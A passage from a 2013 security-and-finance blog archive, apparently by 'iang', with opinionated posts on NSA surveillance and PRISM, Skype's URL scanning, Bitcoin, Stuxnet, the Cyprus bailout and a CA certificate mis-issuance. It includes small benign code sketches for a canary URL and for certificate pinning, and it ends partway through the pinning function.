What about google? Some outrage from the same source:

I had to admit I was shocked by one thing: I'm amazed Google is transmitting unencrypted data between datacenters.

is met with Varda's comment:

We're (I think) talking about Google-owned fiber between Google-owned endpoints, not shared with anyone, and definitely not the public internet. Physically tapping fiber without being detected is pretty difficult and a well-funded state-sponsored entity is probably the only one that could do it.

Ah. So google did some risk analysis and thought this was one they could pass on. Google's bad. A bit of research turns up a BlackHat presentation from 2003:

  • Commercially available taps are readily available that produce an insertion loss of 3 dB which cost less than $1000!
  • Taps currently in use by state-sponsored military and intelligence organizations have insertion losses as low as 0.5 dB!
  • That document indicates 2001 published accounts of NSA tapping fibre, and I found somewhere a hint that it was first publicly revealed in 1999. I'm pretty sure we knew about the USS Jimmy Carter back then, although my memory fades...

    So maybe Google thought it hard to tap fibre, but actually we've known for over a decade that this is not so. Google's bad; they are indeed negligent. Jeroen van Gelderen says:

    Correct me if I'm wrong but you promise that "[w]e restrict access to personal information to Google employees, contractors and agents who need to know that information in order to process it for us, and who are subject to strict contractual confidentiality obligations and may be disciplined or terminated if they fail to meet these obligations."

    Indeed, as a matter of degree, I would say google are grossly negligent: the care that they show for physical security at their data centers, and all the care that they purport in other security matters, was clearly not shown once the fiber left their house.

    Meanwhile, given the nature of the NSA's operations, some might ask (as Jeroen does):

    Now that you have been caught being utterly negligent in protecting customer data, to the point of blatantly violating your own privacy policies, can you please tell us which of your senior security people were responsible for downplaying the risk of your thousands of miles of unsecured, easily accessible fibers being tapped? Have they been fired yet?

    Chances of that one being answered are pretty slim. I can imagine Facebook being pretty relaxed about this. I can sort of see Apple dropping the ball on this. I'm not going to spare any time on Microsoft, who've been on the contract teat since time immemorial.

    But google? That had security street cred? Time to call a spade a spade: if google are not analysing and revealing how they came to miss these known and easy threats, then how do we know they aren't conspirators?

    Posted by iang at 01:34 PM | Comments (1) | TrackBack

    July 30, 2013

    The NSA is lying again -- how STOOPID are we?

    In the on-going tit-for-tat between the White House and the world (Western cyberwarriors versus Chinese cyberspies; Obama and will-he-won't-he scramble his forces to intercept a 29-year-old hacker who is-flying-isn't-flying; the ongoing search for the undeniable Iranian casus belli; the secret cells in Apple and Google that are too secret to be found but no longer secret enough to be denied), one does wonder...

    Who can we believe on anything? Here's a data point. This must be the loudest YOU-ARE-STOOPID response I have ever seen from a government agency to its own populace:

    The National Security Agency lacks the technology to conduct a keyword search of its employees’ emails, even as it collects data on every U.S. phone call and monitors online communications of suspected terrorists, according to NSA’s freedom of information officer.

    “There’s no central method to search an email at this time with the way our records are set up, unfortunately,” Cindy Blacker told a reporter at the nonprofit news website ProPublica.

    Ms. Blacker said the agency’s email system is “a little antiquated and archaic,” the website reported Tuesday.

    One word: counterintelligence. The NSA is a spy agency. It has a department that is mandated to look at all its people for deviation from the cause. I don't know what it's called, but more than likely there are actually several departments with this brief. And they can definitely read your email. In bulk, in minutiae, and in ways we civilians can't even conceive.

    It is standard practice at most large organizations — not to mention a standard feature of most commercially available email systems — to be able to do bulk searches of employees’ email as part of internal investigations, discovery in legal cases or compliance exercises.

    The claim that the NSA cannot look at its own email system is either a) a declaration of materially aiding the enemy by not completing its necessary and understood role of counterintelligence (in which case it should be tried in a military court, being wartime, right?), or b) a downright lie to a stupid public.

    I'm inclined to think it's the second (which leaves a fascinating panoply of civilian charges). In which case, one wonders just how STOOPID the people governing the NSA are. Here's another data point:

    The numbers tell the story — in votes and dollars. On Wednesday, the House voted 217 to 205 not to rein in the NSA’s phone-spying dragnet. It turns out that those 217 “no” voters received twice as much campaign financing from the defense and intelligence industry as the 205 “yes” voters.

    .... House members who voted to continue the massive phone-call-metadata spy program, on average, raked in 122 percent more money from defense contractors than those who voted to dismantle it.

    .... Lawmakers who voted to continue the NSA dragnet-surveillance program averaged $41,635 from the pot, whereas House members who voted to repeal authority averaged $18,765.

    So one must revise one's opinion lightly in the face of overwhelming financial evidence: Members of Congress are financially savvy, anything but stupid.

    Which makes the voting public...

    Posted by iang at 10:02 AM | Comments (6) | TrackBack

    July 05, 2013

    FC2014 in Barbados 3-7 March

    Preliminary Call for Papers

    Financial Cryptography and Data Security 2014

    Eighteenth International Conference
    March 3–7, 2014
    Accra Beach Hotel & Spa
    Barbados

    Financial Cryptography and Data Security is a major international forum for research, advanced development, education, exploration, and debate regarding information assurance, with a specific focus on financial, economic and commercial transaction security. Original works focusing on securing commercial transactions and systems are solicited; fundamental as well as applied real-world deployments on all aspects surrounding commerce security are of interest. Submissions need not be exclusively concerned with cryptography. Systems security, economic or financial modeling, and, more generally, inter-disciplinary efforts are particularly encouraged.

    Topics of interests include, but are not limited to:

    Anonymity and Privacy
    Applications of Game Theory to Security
    Auctions and Audits
    Authentication and Identification
    Behavioral Aspects of Security and Privacy
    Biometrics
    Certification and Authorization
    Cloud Computing Security
    Commercial Cryptographic Applications
    Contactless Payment and Ticketing Systems
    Data Outsourcing Security
    Digital Rights Management
    Digital Cash and Payment Systems
    Economics of Security and Privacy
    Electronic Crime and Underground-Market Economics
    Electronic Commerce Security
    Fraud Detection
    Identity Theft
    Legal and Regulatory Issues
    Microfinance and Micropayments
    Mobile Devices and Applications Security and Privacy
    Phishing and Social Engineering
    Reputation Systems
    Risk Assessment and Management
    Secure Banking and Financial Web Services
    Smartcards, Secure Tokens and Secure Hardware
    Smart Grid Security and Privacy
    Social Networks Security and Privacy
    Trust Management
    Usability and Security
    Virtual Goods and Virtual Economies
    Voting Systems
    Web Security

    Important Dates

    Workshop Proposal Submission July 31, 2013
    Workshop Proposal Notification August 20, 2013
    Paper Submission October 25, 2013, 23:59 UTC
    (19:59 EDT, 16:59 PDT) -- FIRM DEADLINE, NO EXTENSIONS WILL BE GRANTED
    Paper Notification December 15, 2013
    Final Papers January 31, 2014
    Poster and Panel Submission January 8, 2014
    Poster and Panel Notification January 15, 2014

    Conference March 3-7, 2014

    [ snip ... more at CFP ]

    Posted by iang at 01:09 AM | Comments (0) | TrackBack

    June 07, 2013

    PRISM Confirmed: major US providers grant direct, live access to the NSA and FBI

    In an extraordinary clean sweep of disclosure from the Washington Post and the Guardian:

    The National Security Agency and the FBI are tapping directly into the central servers of nine leading U.S. Internet companies, extracting audio and video chats, photographs, e-mails, documents, and connection logs that enable analysts to track foreign targets, according to a top-secret document obtained by The Washington Post.

    The process is by direct connection to the servers, and requires no intervention by the companies:

    Equally unusual is the way the NSA extracts what it wants, according to the document: “Collection directly from the servers of these U.S. Service Providers: Microsoft, Yahoo, Google, Facebook, PalTalk, AOL, Skype, YouTube, Apple.”

    ....
    Dropbox, the cloud storage and synchronization service, is described as “coming soon.”

    From outside direct access might appear unusual, but it is actually the best way as far as the NSA is concerned. Not only does it give them access at Level Zero, and probably better access than the company has itself, it also provides the victim supplier plausible deniability:

    “We do not provide any government organization with direct access to Facebook servers,” said Joe Sullivan, chief security officer for Facebook. ....

    “We have never heard of PRISM,” said Steve Dowling, a spokesman for Apple. “We do not provide any government agency with direct access to our servers, ..." ....

    “Google cares deeply about the security of our users’ data,” a company spokesman said. “We disclose user data to government in accordance with the law, and we review all such requests carefully. From time to time, people allege that we have created a government ‘back door’ into our systems, but Google does not have a ‘back door’ for the government to access private user data.”

    Microsoft also provided a statement: “.... If the government has a broader voluntary national security program to gather customer data we don’t participate in it.”

    Yahoo also issued a denial. “Yahoo! takes users’ privacy very seriously,” the company said in a statement. “We do not provide the government with direct access to our servers, systems, or network.”

    How is this apparent contradiction possible? It is generally done via secret arrangements, not with the company, but with the employees. The company does not provide back-door access, but the people do. The trick is to place people with excellent tech skills and dual loyalties into strategic locations in the company. These 'assets' will then execute the work required in secret, and spare the company and almost all of their workmates the embarrassment.

    Patriotism and secrecy are the keys. The source of these assets is easy: retired technical experts from the military and intelligence agencies. There are huge numbers of these people exiting out of the armed forces and intel community every year, and it takes only a little manipulation to present stellar CVs at the right place and time. Remember, the big tech companies will always employ a great CV that comes highly recommended by unimpeachable sources, and leapfrogging into a stable, very well paid civilian job is worth any discomfort.

    Everyone wins. It is legal, defensible and plausibly deniable. Such people are expert at keeping secrets -- about their past and about their current work. This technique is age-old, refined and institutionalised for many a decade.

    Questions remain: what to do about it, and how much to worry about it? Once it has started, this insertion tactic is rather difficult to stop and root out. At CAcert, we cared and a programme developed over time that was strong and fair -- to all interests. Part of the issue is dealing with the secrecy of it all:

    Government officials and the document itself made clear that the NSA regarded the identities of its private partners as PRISM’s most sensitive secret, fearing that the companies would withdraw from the program if exposed. “98 percent of PRISM production is based on Yahoo, Google and Microsoft; we need to make sure we don’t harm these sources,” the briefing’s author wrote in his speaker’s notes.

    But for the big US companies, is it likely that they care? Enough? I am not seeing it, myself, but if they are interested, there are ways to deal with this. Fairly, legally and strongly.

    How much should we worry about it? That depends on (a) what is collected, (b) who sees it, and (c) who's asking the question?

    There has been “continued exponential growth in tasking to Facebook and Skype,” according to the PRISM slides. With a few clicks and an affirmation that the subject is believed to be engaged in terrorism, espionage or nuclear proliferation, an analyst obtains full access to Facebook’s “extensive search and surveillance capabilities against the variety of online social networking services.”

    According to a separate “User’s Guide for PRISM Skype Collection,” that service can be monitored for audio when one end of the call is a conventional telephone and for any combination of “audio, video, chat, and file transfers” when Skype users connect by computer alone. Google’s offerings include Gmail, voice and video chat, Google Drive files, photo libraries, and live surveillance of search terms.

    Firsthand experience with these systems, and horror at their capabilities, is what drove a career intelligence officer to provide PowerPoint slides about PRISM and supporting materials to The Washington Post in order to expose what he believes to be a gross intrusion on privacy. “They quite literally can watch your ideas form as you type,” the officer said.

    Live access to everything, it seems. So who sees it?

    My rule of thumb was that if the information stayed in the NSA, then that was fine. Myself, my customers and my partners are not into "terrorism, espionage or nuclear proliferation." So as long as there is a compact with the intel community to keep that information clean and tight, it's not so worrying to our business, our privacy, our people or our legal situation.

    But there is no such compact. Firstly, they have already engaged the FBI and the US Department of Justice as partners in this information:

    In exchange for immunity from lawsuits, companies such as Yahoo and AOL are obliged to accept a “directive” from the attorney general and the director of national intelligence to open their servers to the FBI’s Data Intercept Technology Unit, which handles liaison to U.S. companies from the NSA. In 2008, Congress gave the Justice Department authority for a secret order from the Foreign Surveillance Intelligence Court to compel a reluctant company “to comply.”

    Anyone with a beef with the Feds is at risk of what would essentially be a corrupt bypass of the legal justice system of fair discovery (see this for the start of this process).

    Secondly, their credibility is zero: The NSA has lied about their access. They have deceived most if not all employees of the companies they have breached. They've almost certainly breached the US constitution and the US law in gaining warrant-free access to citizens. Dismissively. From the Guardian:

    "Fisa was broken because it provided privacy protections to people who were not entitled to them," the presentation claimed. "It took a Fisa court order to collect on foreigners overseas who were communicating with other foreigners overseas simply because the government was collecting off a wire in the United States. There were too many email accounts to be practical to seek Fisas for all."

    The FISA court that apparently governs their access is evidently ungovernable, as even members of Congress cannot breach its secrecy.

    And that's within their own country -- the NSA feels that it is under no such restrictions or niceties outside their own country.

    A reasonable examination of the facts and the record of the NSA (1, 2, 3) would therefore conclude that they cannot be trusted to keep the information secret. American society should therefore be worried. Scared, even. The risk of corruption of the FBI is by itself enough to pull the plug on not just this programme, but the system that allowed it to arise.

    What does it mean to foreign society, companies, businesses, and people? Not a lot different, as all of this was a reasonable assumption anyway. Under the history-not-rules of foreign espionage, anything goes. The only difficulty likely to be experienced is when the NSA conspires with American companies to benefit them both, or when American assets interfere with commercial businesses that they've targeted as assisting enemies.

    One thing that might now get a boost is the Internet in other countries:

    The presentation ... noted that the US has a "home-field advantage" due to housing much of the internet's architecture.

    Take note, the rest of the world!

    Posted by iang at 02:28 AM | Comments (3) | TrackBack

    May 16, 2013

    All Your Skype Are Belong To Us

    It's confirmed -- Skype is revealing traffic to Microsoft.

    A reader informed heise Security that he had observed some unusual network traffic following a Skype instant messaging conversation. The server indicated a potential replay attack. It turned out that an IP address which traced back to Microsoft had accessed the HTTPS URLs previously transmitted over Skype. Heise Security then reproduced the events by sending two test HTTPS URLs, one containing login information and one pointing to a private cloud-based file-sharing service. A few hours after their Skype messages, they observed the following in the server log:

    65.52.100.214 - - [30/Apr/2013:19:28:32 +0200]
    "HEAD /.../login.html?user=tbtest&password=geheim HTTP/1.1"

    [Utrace map: the accesses come from systems which clearly belong to Microsoft. Source: Utrace]
    They too had received visits to each of the HTTPS URLs transmitted over Skype from an IP address registered to Microsoft in Redmond. URLs pointing to encrypted web pages frequently contain unique session data or other confidential information. HTTP URLs, by contrast, were not accessed. In visiting these pages, Microsoft made use of both the login information and the specially created URL for a private cloud-based file-sharing service.

    Now, the boys & girls at Heise are switched-on, unlike their counterparts on the eastern side of the pond. Notwithstanding, Adam Back of hashcash fame has confirmed the basics: URLs he sent to me over skype were picked up and probed by Microsoft.
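
    If you want to reproduce the test yourself, the recipe is simple: mint a unique, unguessable HTTPS URL on a server you control, send it over the channel under suspicion, and then watch your access log for anyone else fetching it. A minimal sketch, where the host name and log path are hypothetical:

        # Sketch: generate a canary URL, then check a web-server access log for third-party hits.
        # The host name and log path below are hypothetical.
        import secrets

        token = secrets.token_hex(16)
        print("Send this over the suspect channel: https://example.org/canary/" + token)

        def probes(logfile="/var/log/nginx/access.log"):
            # Any request for the canary that you didn't make yourself is a probe.
            with open(logfile) as log:
                return [line.strip() for line in log if token in line]

        # later, after sending the URL via the IM client under test:
        # print(probes())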

    What's going on? Microsoft commented:

    In response to an enquiry from heise Security, Skype referred them to a passage from its data protection policy:

    "Skype may use automated scanning within Instant Messages and SMS to (a) identify suspected spam and/or (b) identify URLs that have been previously flagged as spam, fraud, or phishing links."

    A spokesman for the company confirmed that it scans messages to filter out spam and phishing websites.

    Which means Microsoft can scan ALL messages to ANYONE. Which means they are likely fed into Echelon, either already, or just as soon as someone in the NSA calls in some favours. 10 minutes later they'll be realtimed to support, and from thence to datamining because they're pissed that google's beating the hell out of Microsoft on the Nasdaq.

    Game over?

    Or exaggeration? It's all just fine and dandy if all the NSA is interested in is matching the URLs to jihadist websites; I don't care so much for the jihadists. But, from the manual of citizen control comes this warning:

    First they came for the jihadists,
    and I didn't speak out because I wasn't a jihadist.

    Then they came for the cypherpunks,
    and I didn't speak out because I wasn't a cypherpunk.

    Then they came for the bloggers,
    and I didn't speak out because I wasn't a blogger.

    Then they came for me,
    and there was no one left to speak for me.


    Skype, game over.

    Posted by iang at 02:25 PM | Comments (5) | TrackBack

    April 12, 2013

    A Bitcoin for your thoughts... (may regulators live in interesting times)

    Bitcoin has surged in price in the post-Cyprus debacle. To put the finger on the issue, the Troika recommended that the bank deposit holders be hit, and thus the people should directly participate in the pain of bank reconstruction. This is the right solution and the wrong solution, as I pointed out at the time.

    Now we see why it is wrong. The faith of the people in banks is undermined, and rightly so. The "only this time" solution of haircutting the depositors is nonsense, and the people know it. (For those who don't follow this sort of arcana, the FDIC has already rolled out the plan for hitting the depositors in the USA, and the other countries are following suit.)

    Then, ordinary people putting their faith elsewhere is gaining momentum. With the recent surge of post-Cyprus purchases of Bitcoin, it would seem that more and more people are piling in. I counted 3 independent pings in the last 2 days: journos, geeks and my mother.

    This tells me that ordinary people are getting involved in Bitcoin. The old adage about bubbles is that you should get out when the delivery boy gives you a stock tip while riding up in the lift (elevator). And a bubble is what we are seeing, as the Bitcoin price is purely driven by supply and demand, and right now the surge in demand is outstripping the supply.

    But let's take a step back and ponder where we are going. The big picture. A year ago I wrote with Philipp Güring about the effect of Gresham's Law and criminal elements on Bitcoin, and opined that this would limit the Bitcoin unit in the long term. Gresham's Law is simply that, a law, and is mostly fixed by the mining algorithm (which will end) and the block-agreement algorithm (which continues).

    However, the criminal effect is an artifact of people and is an effect that is reversible.

    If the mass of people get into it, then this can swamp the bad elements and reverse the effect of the disease. And, this isn't abnormal, in fact it is the normal new market growth process: early adopters are replaced by the mass market. (People familiar with the VHS story will see rhymes here.) If mass adoption reduces the nasty element to the point where it is below some threshold of cancer, then the unit can and should survive.

    Right now, it feels like that - everyone is positive about Bitcoin. We can predict that the mood will reverse rapidly when the current bubble bursts and the stories of loss circulate. But maybe Bitcoin will survive that too; this is its second bubble, and it may not be its last.

    Which leads us to consider the regulatory angle. I would say the regulators have a problem. A big problem! If we analogise the Bitcoin market along the lines of say MP3 music, back in 1997, we could be at the cusp of a revolution which is going to undermine the CBs in a big way. Bitcoin could survive, be mostly illegal in the eyes of the regulator, and mostly acceptable in the eyes of the people.

    It's game on. The regulators are starting to issue new regs, new guidance notes, etc. But that isn't going to do it, and may even backfire, because while the regulators are looking to attack Bitcoin from the front, they are still working to undermine the credibility of banks from behind. A credible message is lacking.

    And the timing couldn't be better, as the European crisis gathers steam. Spain, which is where the post-Cyprus Bitcoin surge started, and Italy are likely both in for another bailout. Slovenia was in the news this week. No analyst I've read believes that Europe can survive more than one big bailout, nor that the USA can survive Europe.

    Which leads to that old Chinese curse -- may you regulators live in interesting times. This would be a fantastic time to be there, debating and crafting solutions and new world orders. Good luck, but a word of advice: your challenge is to find a credible message -- from the point of view of the people.

    Posted by iang at 02:47 AM | Comments (3) | TrackBack

    March 27, 2013

    NATO opines on cyber-attacks -- Stuxnet was an act of force

    We've all seen the various rumours of digital and electronic attacks carried out over the years by the USA on those countries it targets. Pipelines in Russia, fibre networks in Iraq, etc. And we've all watched the rise of cyber-sabre rattling in Washington DC, for commercial gain.

    What is curious is whether there are any limits on this behaviour. Sigint (listening) and espionage are one thing, but outright destruction takes things to a new plane.

    Which Stuxnet evidences. Reportedly, it destroyed some 20% or so of the Iranian centrifuge capacity (1, 2). And the tracks left by Stuxnet were so broad, tantalising and insulting that the anti-virus community felt compelled to investigate and report.

    But what do other countries think of this behaviour? Is it isolated? Legal? Does the shoe fit for them as well?

    Now comes NATO to opine that the attack was “an act of force”:

    The 2009 cyberattack by the U.S. and Israel that crippled Iran’s nuclear program by sabotaging industrial equipment constituted “an act of force” and was likely illegal under international law, according to a manual commissioned by NATO’s cyber defense center in Estonia.

    “Acts that kill or injure persons or destroy or damage objects are unambiguously uses of force,” according to “The Tallinn Manual on the International Law Applicable to Cyber Warfare.”

    Michael N. Schmitt, the manual’s lead author, told The Washington Times that “according to the U.N. charter, the use of force is prohibited, except in self-defense.”

    That's fairly unequivocal. What to make of this? Well, the USA will deny all and seek to downgrade the report.

    James A. Lewis, a researcher at the Center for Strategic and International Studies, said the researchers were getting ahead of themselves and there had not been enough incidents of cyberconflict yet to develop a sound interpretation of the law in that regard.

    “A cyberattack is generally not going to be an act of force. That is why Estonia did not trigger Article 5 in 2007,” he said, referring to the coordinated DDoS attacks that took down the computer networks of banks, government agencies and media outlets in Estonia that were blamed on Russia, or hackers sympathetic to the Russian government.

    Cue in all the normal political tricks to call white black and black white. But beyond the normal political bluster and management of the media?

    Under the U.N. charter, an armed attack by one state against another triggers international hostilities, entitling the attacked state to use force in self-defense, and marks the start of a conflict to which the laws of war, such as the Geneva Conventions, apply.

    What NATO might be suggesting is that if the USA and Israel have cast the first stone, then Iran is entitled to respond. Further, although this conclusion might be more tenuous, if Iran does respond, this is less interesting to alliance partners. Iran would be within its rights:

    [The NATO Manual] makes some bold statements regarding retaliatory conduct. According to the manual's authors, it's acceptable to retaliate against cyberattacks with traditional weapons when a state can prove the attack led to death or severe property damage. It also says that hackers who perpetrate attacks are legitimate targets for a counterstrike.

    Not only is Iran justified in targeting the hackers in Israel and the USA, NATO allies might not ride to the rescue. Tough words!

    Now is probably a good time to remind ourselves what the point of all this is. We enter alliances which say:

    Article 5 of the NATO treaty requires member states to aid other members if they come under attack.

    Which leads to: Peace. The point of NATO was peace in Europe, and the point of most alliances (even the ones that trigger widespread war such as WWI) is indeed peace in our time, in our place.

    One of the key claims of alliances of peace is that we the parties shall not initiate. This is another game theory thing: we would not want to ally with some other country only to discover they had started a war into which we are now dragged. So we all mutually commit to not starting a war.

    And therefore, Stuxnet must be troubling to the many alliance partners. They see peace now in the Middle East. And they see that the USA and Israel have initiated first strike in cyber warfare.

    This is no Pearl Harbour scenario. It's not even anticipatory self-defence, as, bluster and goading aside, no nation that has developed nuclear weapons has used them since 1945, because of the mechanics of MAD - mutually assured destruction. Iran is not stupid; it knows that use of the weapons would result in immediate and full retaliation. It would be the regime's last act. And, as the USA objective is regime change, this is a key factor.

    So it is entirely welcome and responsible of NATO -- in whatever guise it sees fit -- to stand up and say, NO, this is not what the alliance is about. And it can't really be any other way.

    Posted by iang at 12:33 PM | Comments (1) | TrackBack

    March 18, 2013

    Cyprus deposit holders to take a 7-10% loss -- perversely this is the right Cure, and it may Kill the Patient

    News over the weekend has it that Cyprus has agreed to a bailout, but in exchange for the most terrible of conditions: Cypriot depositors are to be taxed at rates from 6.75% to 9.9% of their deposits.

    This is utter madness, and the reasons are legion. Speaks the Economist:

    EVERYONE agrees that taxpayers should be protected from the cost of bailing out failing banks. But imposing blanket losses on creditors is still taboo. Depositors have escaped the financial crisis largely unscathed for fear of sparking panic, which is why the idea of hitting uninsured depositors in Cypriot banks has caused policymakers angst.

    You muck around with deposit holders or your own people at your peril. There is now a fair chance of a bank run in Cyprus, and a non-trivial chance of riots.

    Further, the bond holders don't get hit. Not even the unprotected ones!

    Worse yet, the status of deposits is enshrined in a century of law, decisions and custom. It is not going to be clear for years whether the levy will survive legal challenges. Consider the mess over Greek bonds in London, and that allegedly big, powerful Russian oligarchs are involved. A legal challenge is a dead certainty.

    Finally, and what is the worst reason of all - the signal has been sent. What happened to the Cypriots can and will happen to the Spanish. And the Italians. And if them, the French. And finally, those safe in the north of Europe will now see that they are not safe.

    The point is not whether this will happen or not: the point is whether you as an individual saver wish to gamble your money in your bank that it won't happen?

    The direction of efforts to improve banks’ liquidity position is to encourage them to hold more deposits; the aim of bail-in legislation planned to come into force by 2018 is to make senior debt absorb losses in the event of a bank failure. The logic behind both of these reform initiatives is that bank deposits have two, contradictory properties. They are both sticky, because they are insured; and they are flighty, because they can be pulled instantly. So deposits are a good source of funding provided they never run. The Cyprus bail-out makes this confidence trick harder to pull off.

    Other than that, it is a really good deal.

    In short, the Cyprus bailout means: start a run on European banks. Only time will tell how this plays out.

    What's to take solace? Perversely, there is an element of justice in this decision. Moral hazard is the problem that has pervaded the corpus bankus for a decade now, and has laid low the financial system.

    Moral hazard has it that if you fully insure the risk, then nobody cares. And indeed, nobody in the banking world cares, it seems, since they've all acquired TBTF status. None of the people care, either, as they happily deposited at those banks, even knowing that the financial sector of Cyprus was many times larger than the economy.

    Go figure ... here comes a financial crisis, and our banks are bigger than our country? What did the Cypriot people do? Did they join the dots and wind back their risk?

    However the figures are massaged down, the nub of the problem will remain: a country with a broken banking model. Unlike Greece, brought low by its unsustainable public finances, Cyprus has succumbed to losses in its oversize banks. By mid-2011 the Cypriot banking sector was eight times as big as GDP; its three big commercial banks were five times as large.

    No. Moral hazard therefore has it that the stakeholders must be punished for their errors. And the stakeholders of last resort are the Cypriot people, or at least their depositors. And their pensioners, it seems:

    In practice the main answer will be to dragoon Cyprus’s pension funds and domestic banks into financing the €4.5 billion of government bonds due to be redeemed over the next three years.

    It is highly likely that Cypriot pensioners will lose the lot, as happened in Spain.

    Which does nothing to obviate the other arguments listed above. Regardless of this sudden and surprising display of backbone by the Troika, it is still madness. While we may actually be on the cusp of a cure for the disease, the patient might die anyway.

    European leaders could at long last bite the bullet and insist on a bail-in of bank creditors to cover expected losses. The snag is that any such action would set alarm-bells ringing for investors with serious money at stake in banks elsewhere in the euro area. Mario Draghi, the ECB’s president, said on March 7th that “Cyprus’s economy is a small economy but the systemic risks may not be small.”

    Watch Cyprus with interest, as if your future depends on it. It does.

    Posted by iang at 07:02 AM | Comments (1) | TrackBack

    March 02, 2013

    google leads the world in ... oddball interview questions... ?!? (part 1 in a rant on searching for your HR mission)

    Human Resources is one of those areas that seemed fatally closed to the geek world. Warning to reader: if you do not think Human Resources displays the highest volatility in ROI of any decision you can make, you're probably not going to want to read anything more of this rant. However, if you are bemused about oddball questions asked at interviews, maybe there is something here for you.

    A rant in three parts (I, II, III).

    Let's talk about google, which leads the world in infamous recruiting techniques. So much so that an entire industry of soothsayers, diviners and astrologers has sprung up around companies like it, in order to prepare willing victims with recipes of puzzlers, newts' eyes and moon dances.

    Why is this? Well, one of the memes in the press is about strange interview questions, and poking sly fun at google in the process:

    • "Using only a four-minute hourglass and a seven-minute hourglass, measure exactly nine minutes--without the process taking longer than nine minutes,"
    • "A man pushed his car to a hotel and lost his fortune. What happened?"

    These oddball questions are all very cute, the sort of teasers we all loved playing with as children. More. But what do they have to do with google?

    To be fair to them, it looks like google don't ask these questions at all, and indeed may have banned them entirely. But we need a foil for this topic, so let's play along as if they do spin some curveballs for the fun of it.

    Let's answer the implied question of "what's the benefit?" by reference to other so-called oddball questions:

    • "If Germans were the tallest people in the world, how would you prove it?" -- Asked at Hewlett-Packard, Product Marketing Manager candidate
    • "Given 20 'destructible' light bulbs (which break at a certain height), and a building with 100 floors, how do you determine the height that the light bulbs break?" -- Asked at Qualcomm, Engineering candidate
    • "How do you feel about those jokers at Congress?" -- Asked at Consolidated Electrical, Management Trainee candidate

    The first one is straight marketing, understanding how to segment the buyers. The second is straight engineering, and indeed every computer scientist should know the answer: binary search. Third one? How to handle a loaded question.
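    By way of illustration, a minimal sketch of that binary-search answer (the 100 floors and 20 bulbs come from the question; the breaks_at threshold in the example call is hypothetical):

    # Binary search for the lowest floor at which a bulb breaks.
    # With 100 floors, binary search needs at most 7 drops (2^7 = 128 > 100),
    # so the 20 bulbs on offer are far more than enough.
    def breaking_floor(breaks_at, floors=100, bulbs=20):
        """Return the lowest floor at which a bulb breaks, or None if none do."""
        low, high = 1, floors            # candidate range for the breaking floor
        answer = None
        while low <= high and bulbs > 0:
            mid = (low + high) // 2
            if mid >= breaks_at:         # drop from floor mid: the bulb breaks
                bulbs -= 1               # broken bulbs are used up
                answer = mid
                high = mid - 1           # true threshold is at or below mid
            else:                        # the bulb survives and can be reused
                low = mid + 1
        return answer

    print(breaking_floor(breaks_at=73))  # -> 73, using well under 20 bulbs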

    So, all these have their explanation. Oddball questions might have merit. They are searching... but more than that, they are *directly related to the job*. But what about:

    • "How would you cure world hunger?" -- Asked at Amazon.com, Software Developer candidate

    A searching question, I'll grant! But this question has flaws. Other than discovering one's knowledge of modern economics (cf. Yunus, de Soto) or politics or entrepreneurship or farming, how does it relate to ... software? Amazon? Retail markets? It doesn't, I'll say (and I'll leave what it does relate to, and how dangerous that is, as an exercise to the reader after having read all 3 posts).

    Now back to google's alleged questions. First above (hourglasses) was a straight mathematical teaser, but maths has little to do with software. OK, so there is a relationship but these days *any discipline on the planet* is about as related as mathematics, and some are far more relevant. We'll develop this theme in the next post.

    Second question above, about pushing cars to a hotel. What's that about? Actually, the real implied question is, "did you grow up with a certain cultural reference?" Again, nothing to do with software (which I think google still does) and bugger all to do with anything else google might get access to. Also rather discriminatory, but that's life.

    In closing: asking or being asked oddball questions does not correlate with a great place to work. Indeed, chances are, it is inversely correlated, but I'll leave the proof of that for part 2.

    Posted by iang at 02:58 AM | Comments (5) | TrackBack

    February 04, 2013

    Deviant Identity - Facebook and the One True Account

    From Facebook:

    The company identifies three types of accounts that don’t represent actual users: duplicate accounts, misclassified accounts and undesirable accounts. Together, they added up to just over 7 percent of its worldwide monthly active users last year.

    Facebook disclosed the figures in its annual report filed with the U.S. Securities & Exchange Commission on Friday.

    Duplicate accounts, or those maintained by people in addition to their principal account, represent 53 million accounts, or 5 percent of the total, Facebook said.

    Misclassified accounts, including those created for non-human entities such as pets or organizations, which instead should have Facebook Pages, accounted for almost 14 million accounts, or 1.3 percent of the total.

    And undesirable accounts, such as those created by spammers, rounded out the tally with 9.5 million accounts, or 0.9 percent of users.

    Context - systems that maintain user accounts and expect each account to map universally and uniquely to one person and only one person are in for a surprise -- people don't do that. The experience from CAcert is that even with a system that is practically only there for the purpose of mapping a human, for certificates attesting to some aspect of their Identity, there are a host of reasons why some people have multiple accounts. And most of those are good reasons, including ones laid at the door of the system provider.

    There is no One True Account, just as there is no One True Name or One True Identity. Nor are there any One True Statistics, but what we have can help.

    Posted by iang at 10:38 AM | Comments (0) | TrackBack

    January 05, 2013

    Yet another CA snafu

    In the closing days of 2012, another CA was caught out making mistakes:

    2012.5 -- A CA here issued 2 intermediate roots to two separate customers 8th August 2011 Mozilla mail/Mert Özarar. The process that allowed this to happen was discovered later on, fixed, and one of the intermediates was revoked. On 6th December 2012, the remaining intermediate was placed into an MITM context and used to issue an unauthorised certificate for *.google.com DarkReading. These certificates were detected by Google Chrome's pinning feature, a recent addition. "The unauthorized Google.com certificate was generated under the *.EGO.GOV.TR certificate authority and was being used to man-in-the-middle traffic on the *.EGO.GOV.TR network" wired. Actions. Vendors revoked the intermediates microsoft, google, Mozilla. Damages. Google will revoke Extended Validation status on the CA in January's distro, and Mozilla froze a new root of the CA that was pending inclusion.

    I collect these stories for a CA risk history, which can be useful in risk analysis.

    Beyond that, what is there to say? It looks like this CA made a mistake that let some certs slip out. It caught one of them later, not the other. The owner/holder of the cert at some point tried something different, including an MITM. One can see the coverup proceeding from there...

    Mistakes happen. This so far is somewhat distinct from issuing root certs for the deliberate practice of MITMing. It is also distinct from the overall risk equation, which says that because any CA can issue certs for any site in your browser, only one compromise is needed and the whole system is compromised. That is, brittle.
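    As an aside, the pinning idea that caught this one is simple to sketch: check the certificate the server actually presents against a fingerprint stored in advance, rather than trusting whichever CA happened to sign it. A minimal sketch with placeholder values (note that real pinning, Chrome's included, typically pins the public-key info of keys in the chain rather than the leaf certificate digest):

    # Minimal sketch of certificate pinning: compare the live certificate's
    # fingerprint against one we recorded beforehand. The hash below is a
    # placeholder, not a real pin.
    import hashlib
    import socket
    import ssl

    PINS = {
        "www.google.com": {"d2b0...deadbeef"},   # hostname -> allowed SHA-256 digests
    }

    def leaf_fingerprint(host, port=443):
        """Connect over TLS and return the SHA-256 hex digest of the leaf cert."""
        ctx = ssl.create_default_context()
        with socket.create_connection((host, port)) as sock:
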